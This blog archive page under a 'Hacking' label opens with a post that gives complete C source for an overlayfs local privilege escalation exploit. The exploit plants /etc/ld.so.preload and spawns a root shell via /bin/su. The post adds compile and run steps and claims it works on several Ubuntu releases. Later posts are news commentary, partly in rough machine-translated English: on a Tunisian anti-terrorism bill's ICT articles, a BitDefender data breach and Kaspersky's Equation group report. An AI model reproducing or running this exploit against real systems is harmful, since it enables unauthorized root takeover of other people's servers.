Random Post

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
Thursday, February 18, 2016
Friday, December 11, 2015
no image

I will show you how hackers gain root access to your Linux VPS server. This exploit still working nowadays.
The process will be explained with details following this demo:
First: Create a C file "privilege_escalation.c

put this code in the file:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
static char child_stack[1024*1024];
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    fprintf(stderr,"spawning threads\n");
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
            waitpid(pid, &status, 0);
        }
        waitpid(init, &status, 0);
        return 0;
    }
    usleep(300000);
    wait(NULL);
    fprintf(stderr,"child threads done\n");
    fd = open("/etc/ld.so.preload",O_WRONLY);
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
Second Step : Compile and Build the program :
To create the executable run this command:
user@ubuntu-server-1504:~$ gcc privilege_escalation.c -o privilege_escalation
 This will make an executable program  called privilege_escalation..

Final Step :  Get  access to shell As root (running the exploit)

execute the exploit by this command:
user@ubuntu-server-1504:~$ ./privilege_escalation

This will generate a root terminal.
This exploit works on Ubuntu 12.04, 14.04, 14.10, 15.04


12:29 PM

I will show you how hackers gain root access to your Linux VPS server. This exploit still working nowadays. The process will be e...

Read more »
Monday, August 3, 2015
no image
The Assembly of the representatives of the people (ARP) currently continues thestudy by the Committee on the anti-terrorism Act. On the evening of Monday, July6, the Minister of the Interior, Mohamed Najem Gharssali was auditioned by thevarious committees in a meeting held behind closed doors.
 At this hearing and aboutthe ICT dimension, the Minister of the Interior has spoken with MEPs on how hisMinistry is now working with social networks (facebook, twitter, etc.) to hunt downpeople who hide behind the accounts that are apologists for terrorism.Mohamed Najem Gharssali also referred to the cyber-surveillance and the use of ICTfor terrorist purposes.
 The Minister of the Interior admitted that executives of theMinistry are not actually adequate combat cybercrime training, but this will beremedied soon. The Minister however held to remind MEPs and several times thathis Department is committed to respect for the privacy of Internet users.Prior to his stint in plenary, it is interesting for us to do a quick read of the anti-terrorist act, especially in its ICT component. While brings this new law?Counsel Sana Mason, Member of Ennahdha to ARP noted in a speech on Shems FmFriday July 3 that it is just the ICT dimension which is the great novelty of this Anti-terrosite Act.

Indeed, article 13 of the new law defines any act of damage to networks oftelecommunications or systems of information as a terrorist act. For this, sanctionscan range from 5 years to 20 years in prison with a fine whose value varies between50,000 and 100,000 dinars.
In article 15, Bill shows specific on the matter of transport and facilitation oftransport of electronic or computer hardware or software that could be used todesign, manufacture, or carry biological, chemical or nuclear weapons.
Then, it is in article 30 Bill considers the fact to glorify a terrorist or a terroristorganization as well as his ideas and opinions as part of a terrorist act. Thus, astraightforward interpretation of this article states that any publication on twitter orFacebook where its owner shows its support to terrorist groups is consideredbeautiful is good as a terrorist in the eyes of the law. He is liable to a term ofimprisonment with the maximum period of 5 years and a fine ranging from 5 to 10thousand dinars.
In article 33, the Andalucian draft Bill considered terrorist action to provideequipment, web sites, documents, or photos for the doing of a terrorist crime. In thisarticle, the first question that comes to mind is the following: an a hosting spaceprovider is, thus, considered him as a terrorist? Because in this case, of great hostslike GoDaddy, OVH or even our own phone as operators themselves provide Cloudhosting solutions.
In article 49, Bill gives legal pole of counter-terrorism powers to decide on thedeletion or censorship of audio / audiovisual or digital publications, or computerdata that are related to acts of terrorism.
About this axis, the question that should be asked is the framing content types thatmay or may not be relayed by the media in the context of their journalistic work.Thus, if an online media relays a screenshot of an account that publishes photospraising terrorism be obliged to censor the content?
PIs: How will this pole delete it? By contacting the administrator of support bysending him a requisition with a receipt of the requisition processing time? Or willthey be granted the right to hack says digital media and delete the contents? Andthen, how will they do with foreign media/media? Are they going to send themrequisitioning 'international '? Or apply this procedure only with the media/mediabased/hosted in Tunisia?
The people's representatives Assembly continues the discussion of the anti-terrorism Act in commissions. We concentrated on the pane ICT of this law whichprovides for fines and penalties of prisons for all those who broadcast messagesglorifying terrorists on the Net as well as those who use ICTs to sow terror (read thefirst part of the article by clicking here). In this second part continues to unravelother aspects ICT of the said Act.
In article 52 of this Bill, it is the issue of interception of communications which isprocessed. And this interception of communications includes traffic data, of listening, of the exploration of the content of communications, the fact to save, orcopy. The article quotes so the need for involvement of the technicaltelecommunications Agency (A2T), telecommunications operators, access networksoperators, access and internet service providers, etc.
The duration of an interception operation may not last more than four months,renewable one time and cannot be triggered only by a decision of the public prosecutor or a judge of investigation.

In the event that the interception operation does not result in a criminal trial, article54 provides that the data collected are subject to protection such as those dictatedby the laws of the area of protection of personal data. That said, it makes sense tomention that the Bill cites no reference to these laws in question!




   The Bill defines in its article 59 what is the audio-visual control. It is putting in placethe technical means for filming including suspects in a case of terrorist crime. Thetechnical means can be deployed according to the Bill in private or public areas, orprivate or public vehicles (metro/bus/train). The Bill also allows to implement thesetechnologies without that private owners of the vehicles or the places in questiondon't know it or accept it or not.
Still, the article in question States that the data collected subject to protection such as those dictated by the laws in the field of protection of personal data and thiswithout any specific reference to these laws.
Article 60 reads also that any person who intentionally distributes data collectedduring the interception or audio-visual control operations is sentenced to 10 yearsin prison.
Then section 63 defines the constitution of the national counter-terrorismCommittee. Thus, it is appropriate to mention that the 6 members of the Committee,a seat is reserved for the national Instance for the Protection of personal data.
This Committee has a role instead of proposal for a national strategy to combatterrorism. The Committee is responsible for coordinating international with foreignpartners in the fight against terrorism. Note that this Bill which should be adoptedurgently by the Parliament remains incomplete on that date. Indeed, if therapporteur of the commission on general legislation declares that the contributionof this new Bill is really the coverage of ICT aspects in terrorist crimes, we do notfind that the question has been processed with care. Nothing that the definitions ofwhat is meant by "damage an information system or a telecommunications network"which remain very ambiguous.
Indeed Bill has reserved two whole pages to define biological, chemical weapons,and nuclear. But no definition of the terms in relation to information andcommunication technologies has been listed. The very vague terms of the genus"technical means", or "digital publishing" opens the door to several interpretations.The issue of cybercrime is first and foremost a full question which should be treatedseparately by setting all the contentious issues. We recall as well as cybercrime Billhas not yet submitted to the Ministerial Council. Gold this law should be a legalrepository for crimes on the Internet and that will define, and this fact more clearly,these "technical means."
Note that the Instance Nationale de Protection of personal data - who this Billassigns a role important - has no technical expert in its composition.

                                                                                                   Marwen Dhemaied

4:59 PM

The Assembly of the representatives of the people (ARP) currently continues thestudy by the Committee on the anti-terrorism Act. On the e...

Read more »
Sunday, August 2, 2015
no image
All financial services, and e-shopping sites, but we at least expect companies protection and antivirus software vendors to keep our data secure and encrypted manner.

One of the best known companies in the field of information security, which produces the most respected program among antivirus "BitDefender", impenetrable, and the diversion of part of the data for many of its customers.

Penetrating many data clients "BitDefender" is quite awkward for a security company, and it is not due to the inability of the company to prevent hackers from infiltrating, but because the company maintains a large part of the sensitive data for their clients without encryption!!!

Something unexpected from the security firm of that size.

It seems that a hacker who carries the alias "DetoxRansome", was able to penetrate your BitDefender server is Cloud-based and the hosting Admin Panel for small and medium-sized enterprises, could a hacker steal many usernames and passwords

Disturbing really hacked company BitDefender, that data on unencrypted login process completely!

Information security company recognized the Romanian it has been penetrated, said the attack happened on its system did not penetrate the entire server, but a vulnerability displays many users accounts and passwords, which is believed to be a loophole injection SQL Injection.

It is noteworthy that a hacker had a limited amount of information, customer accounts and threatened a hacker it will leak information obtained unless the company BitDefender ransom him the amount of $ 15,000.


The weekend hacker detection list contains approximately 250 user name and password for BitDefender accounts.

However the company refused to pay the ransom requested by a hacker, and now the company in collaboration with the security investigation into the hack.

While the hack did not affect only 1% of the company's clients, but we are disappointed, as the company this size, had failed to implement the necessary security measures to protect its customers.

4:37 PM

All financial services, and e-shopping sites, but we at least expect companies protection and antivirus software vendors to keep our data ...

Read more »
Saturday, March 14, 2015
Monday, March 9, 2015
Tuesday, February 17, 2015
no image


Kaspersky ,society has discovered a group of pirates using sophisticated malware , who settled in the heart of the hard drives. Their activities were related to the American intelligence agency.

For at least fourteen years, a group of hackers has managed to conduct hundreds oflarge-scale attacks in 30 countries, without ever being disturbed. Named "Equation",this group was outed by computer security firm Kaspersky, in a survey publishedTuesday. Revealed suggests that these pirates were related to the NSA, theAmerican intelligence agency who designed program PRISM of surveillance of theNet.
Kaspersky never named the NSA in its report. The approximation equation is thenature of the weapons usedOne of the viruses developed by the group in 2008,called Fanny, uses the same faults of safeties that Stuxnet, a spyware program thatwas spying on Iranian nuclear infrastructure"Use similar same faults on two differentviruses in a close time, indicates that the Group Equation and the developers ofStuxnet are the same people or work closely together," says the reportThe faultswere even used in Fanny before Stuxnet. However, according to the revelations ofthe alerts Launcher Edward Snowden, the NSA and Israel have co-authored Stuxnet.Another clue malicious software from Equation included in their code the same namea NSA tool unveiled by The Intercept last March, underlines the ArsTechnica website.

Undetectable malware:

More than 500 infected computers have been detected by Kaspersky, in 42countries whose many monitored by the United States: Iran, Pakistan, Syria, etc. TheFrance would have been affected to a lesser extent. The first Equation operationdates back to 2001, "perhaps even 1996" says the report. The targets ranged fromGovernments to the antennae diplomatic, military, media, Islamic organizations orsectors of telecoms, hydrocarbons, nuclear energy, nanotechnology, finance.
Fanny and Stuxnet aimed both computers "air-gapped", i.e. not connected to theInternet. Fanny could hide in an invisible part of a USB key, when the key wasconnected to a non-connected computer it analyzed its data. One of the othermodes of contamination through damaged Web pagesKaspersky cites the case offorums of discussions djihadites or advertisements on popular sites in the Middle East.
The malicious software infected a specific part of the hard drive, its internalsoftware, and remained invisibleTo achieve this feat, the creators of the programhad to know the source code of the target computer's hard diskFormer agentscontacted by the Reuters news agency confirmed that the NSA was able to hidespyware in many major manufacturers, such as Western Digital or Toshiba harddrivesMany of these manufacturers have denied to Reuters have knowledge ofspyware of EquationWestern Digital said that the company was not communicatingthe source code of its hard drives to governmental agencies.
 "The star of the death of the Galaxy of malware.:
Kaspersky portrayed Equation as one of the most experienced hackers in the world.It "transcends all that is known in terms of complexity and sophistication of the techniques' and 'single in almost all aspects of its activities 'Never to run out ofsuperlatives, he nicknamed same Equation "star of the death of the Galaxy ofmalware.
Kaspersky takes the bulk of its revenue from computer sales of antivirus andprotection. It's best interest to present his discoveries and the threats that it revealsas a major. MondayFebruary 16, the company unveiled a suite of hackings of banksthat led to the flight of 300 million dollars from 2013"It is probably the mostsophisticated attack in the world in terms of tactics and methods", stated the leaderAmerica of North of Kaspersky, Chris Doggett told the New York Times.
Several of the vulnerabilities exploited by Equation were nicknamed 'zero-day',security vulnerabilities which have not yet been discovered or used, and whichrequire a high level of expertise. These faults are in the crosshairs of all largecompanies. This summer, Google launched Project Zero, a former pirates teamassembled to track down and repair faults 'zero-day '.

11:29 AM

Kaspersky ,society has discovered a group of pirates using sophisticated malware , who settled in the heart of the hard drives. Their a...

Read more »
 
Google Analytics Alternative